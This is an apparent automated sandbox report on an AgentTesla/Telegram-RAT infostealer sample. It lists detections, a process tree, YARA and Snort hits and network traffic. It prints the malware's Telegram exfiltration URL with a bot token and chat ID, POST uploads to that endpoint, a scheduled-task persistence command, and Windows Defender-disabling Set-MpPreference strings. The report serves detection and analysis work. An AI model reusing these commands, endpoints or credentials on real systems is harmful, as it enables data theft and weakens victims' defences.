Edit tour

Windows Analysis Report
ORDER (6256 OS)#391 PI.exe

Overview

General Information

Sample Name:	ORDER (6256 OS)#391 PI.exe
Analysis ID:	764027
MD5:	19081ef2a08f678a3203b29124043c41
SHA1:	e86acea06a600f170402a0c1020c25ac2550ffa0
SHA256:	2f356283c209400c6385a24450f266b59477e035e9389c8d1af4843cd1ad2374
Tags:	agentteslaexe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AgentTesla

Yara detected AntiVM3

Sigma detected: Scheduled temp file as task from temp location

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Installs a global keyboard hook

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Contains functionality to register a low level keyboard hook

Machine Learning detection for sample

May check the online IP address of the machine

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Machine Learning detection for dropped file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Uses a known web browser user agent for HTTP communication

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

ORDER (6256 OS)#391 PI.exe (PID: 1688 cmdline: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe MD5: 19081EF2A08F678A3203B29124043C41)

schtasks.exe (PID: 5964 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 2236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ORDER (6256 OS)#391 PI.exe (PID: 5052 cmdline: {path} MD5: 19081EF2A08F678A3203B29124043C41)

ORDER (6256 OS)#391 PI.exe (PID: 1948 cmdline: {path} MD5: 19081EF2A08F678A3203B29124043C41)

WsdnBq.exe (PID: 6004 cmdline: C:\Users\user\AppData\Roaming\WsdnBq.exe MD5: 19081EF2A08F678A3203B29124043C41)

schtasks.exe (PID: 2224 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WsdnBq.exe (PID: 1328 cmdline: {path} MD5: 19081EF2A08F678A3203B29124043C41)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage?chat_id=1644584536"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x22d8b:$a20: get_LastAccessed 0x24dde:$a30: set_GuidMasterKey 0x22e59:$a33: get_Clipboard 0x22e67:$a34: get_Keyboard 0x23f96:$a35: get_ShiftKeyDown 0x23fa7:$a36: get_AltKeyDown 0x22e74:$a37: get_Password 0x23882:$a38: get_PasswordHash 0x246a9:$a39: get_DefaultCredentials
00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0xfb66b:$a20: get_LastAccessed 0x12368b:$a20: get_LastAccessed 0xfd6be:$a30: set_GuidMasterKey 0x1256de:$a30: set_GuidMasterKey 0xfb739:$a33: get_Clipboard 0x123759:$a33: get_Clipboard 0xfb747:$a34: get_Keyboard 0x123767:$a34: get_Keyboard 0xfc876:$a35: get_ShiftKeyDown 0x124896:$a35: get_ShiftKeyDown 0xfc887:$a36: get_AltKeyDown 0x1248a7:$a36: get_AltKeyDown 0xfb754:$a37: get_Password 0x123774:$a37: get_Password 0xfc162:$a38: get_PasswordHash 0x124182:$a38: get_PasswordHash 0xfcf89:$a39: get_DefaultCredentials 0x124fa9:$a39: get_DefaultCredentials
Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x1931e9:$a20: get_LastAccessed 0x194f4d:$a30: set_GuidMasterKey 0x1932b0:$a33: get_Clipboard 0x1932be:$a34: get_Keyboard 0x19427b:$a35: get_ShiftKeyDown 0x19428c:$a36: get_AltKeyDown 0x1932cb:$a37: get_Password 0x193c4a:$a38: get_PasswordHash 0x1948de:$a39: get_DefaultCredentials
Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x91dc:$a20: get_LastAccessed 0xaf40:$a30: set_GuidMasterKey 0x92a3:$a33: get_Clipboard 0x92b1:$a34: get_Keyboard 0xa26e:$a35: get_ShiftKeyDown 0xa27f:$a36: get_AltKeyDown 0x92be:$a37: get_Password 0x9c3d:$a38: get_PasswordHash 0xa8d1:$a39: get_DefaultCredentials
Process Memory Space: WsdnBq.exe PID: 6004	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: WsdnBq.exe PID: 1328	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: WsdnBq.exe PID: 1328	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: WsdnBq.exe PID: 1328	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x24777:$s10: logins 0x242b0:$s11: credential 0x21259:$g1: get_Clipboard 0x21267:$g2: get_Keyboard 0x21274:$g3: get_Password 0x22386:$g4: get_CtrlKeyDown 0x22396:$g5: get_ShiftKeyDown 0x223a7:$g6: get_AltKeyDown
0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x2118b:$a20: get_LastAccessed 0x231de:$a30: set_GuidMasterKey 0x21259:$a33: get_Clipboard 0x21267:$a34: get_Keyboard 0x22396:$a35: get_ShiftKeyDown 0x223a7:$a36: get_AltKeyDown 0x21274:$a37: get_Password 0x21c82:$a38: get_PasswordHash 0x22aa9:$a39: get_DefaultCredentials
4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x26577:$s10: logins 0x260b0:$s11: credential 0x23059:$g1: get_Clipboard 0x23067:$g2: get_Keyboard 0x23074:$g3: get_Password 0x24186:$g4: get_CtrlKeyDown 0x24196:$g5: get_ShiftKeyDown 0x241a7:$g6: get_AltKeyDown
4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x22f8b:$a20: get_LastAccessed 0x24fde:$a30: set_GuidMasterKey 0x23059:$a33: get_Clipboard 0x23067:$a34: get_Keyboard 0x24196:$a35: get_ShiftKeyDown 0x241a7:$a36: get_AltKeyDown 0x23074:$a37: get_Password 0x23a82:$a38: get_PasswordHash 0x248a9:$a39: get_DefaultCredentials
0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x26577:$s10: logins 0x4e597:$s10: logins 0x260b0:$s11: credential 0x4e0d0:$s11: credential 0x23059:$g1: get_Clipboard 0x4b079:$g1: get_Clipboard 0x23067:$g2: get_Keyboard 0x4b087:$g2: get_Keyboard 0x23074:$g3: get_Password 0x4b094:$g3: get_Password 0x24186:$g4: get_CtrlKeyDown 0x4c1a6:$g4: get_CtrlKeyDown 0x24196:$g5: get_ShiftKeyDown 0x4c1b6:$g5: get_ShiftKeyDown 0x241a7:$g6: get_AltKeyDown 0x4c1c7:$g6: get_AltKeyDown
0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x22f8b:$a20: get_LastAccessed 0x4afab:$a20: get_LastAccessed 0x24fde:$a30: set_GuidMasterKey 0x4cffe:$a30: set_GuidMasterKey 0x23059:$a33: get_Clipboard 0x4b079:$a33: get_Clipboard 0x23067:$a34: get_Keyboard 0x4b087:$a34: get_Keyboard 0x24196:$a35: get_ShiftKeyDown 0x4c1b6:$a35: get_ShiftKeyDown 0x241a7:$a36: get_AltKeyDown 0x4c1c7:$a36: get_AltKeyDown 0x23074:$a37: get_Password 0x4b094:$a37: get_Password 0x23a82:$a38: get_PasswordHash 0x4baa2:$a38: get_PasswordHash 0x248a9:$a39: get_DefaultCredentials 0x4c8c9:$a39: get_DefaultCredentials
5.2.WsdnBq.exe.2e72288.0.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x32ec0:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x32f04:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x32f4c:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x331d8:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0x3323c:$s2: Set-MpPreference -DisableArchiveScanning $true 0x33294:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x332ec:$s4: Set-MpPreference -DisableScriptScanning $true 0x33338:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x33378:$s6: Set-MpPreference -MAPSReporting 0 0x333c4:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x3341c:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x3346c:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x334bc:$s10: Set-MpPreference -SevereThreatDefaultAction 6
0.2.ORDER (6256 OS)#391 PI.exe.30f22b8.0.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x32ec0:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x32f04:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x32f4c:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x331d8:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0x3323c:$s2: Set-MpPreference -DisableArchiveScanning $true 0x33294:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x332ec:$s4: Set-MpPreference -DisableScriptScanning $true 0x33338:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x33378:$s6: Set-MpPreference -MAPSReporting 0 0x333c4:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x3341c:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x3346c:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x334bc:$s10: Set-MpPreference -SevereThreatDefaultAction 6
Click to see the 3 entries

Sigma Signatures

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe, ParentImage: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe, ParentProcessId: 1688, ParentProcessName: ORDER (6256 OS)#391 PI.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp, ProcessId: 5964, ProcessName: schtasks.exe

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 149.154.167.220

Timestamp:	192.168.2.4149.154.167.220496964432851779 12/09/22-10:19:40.984166
SID:	2851779
Source Port:	49696
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 149.154.167.220

Timestamp:	192.168.2.4149.154.167.220496984432851779 12/09/22-10:20:17.013980
SID:	2851779
Source Port:	49698
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ORDER (6256 OS)#391 PI.exe

ReversingLabs: Detection: 30%

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\WsdnBq.exe

ReversingLabs: Detection: 30%

Machine Learning detection for sample

Source: ORDER (6256 OS)#391 PI.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\WsdnBq.exe

Joe Sandbox ML: detected

Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage?chat_id=1644584536"}
Source: WsdnBq.exe.1328.8.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage"}

Source: ORDER (6256 OS)#391 PI.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.4:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2

Source: ORDER (6256 OS)#391 PI.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RycGBA2.pdb source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
Source:	Binary string: RycGBA2.pdbSHA256 source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_0F2E0D18
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_0F2E0D08
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_0F2E0DD3
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	5_2_0E820B98
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	5_2_0E820B88

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49696 -> 149.154.167.220:443
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49698 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

May check the online IP address of the machine

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	DNS query: name: api.ipify.org

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d3fba18902Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d46448f6a9Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 54.91.59.199 54.91.59.199
Source: Joe Sandbox View	IP Address: 54.91.59.199 54.91.59.199

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443

Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: WsdnBq.exe, 00000008.00000003.450250389.00000000015E6000.00000004.00000020.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000003.535612424.00000000015F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301689714.0000000005F13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307345140.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304196469.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304651333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304139159.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305855891.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306476107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304491242.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303482107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305929932.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304437139.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307312499.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304413252.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306400487.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303216869.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303104333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306139248.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304750887.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304466931.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305354155.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303996945.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303155186.0000000005F13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301936890.0000000005ED3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comigXje
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
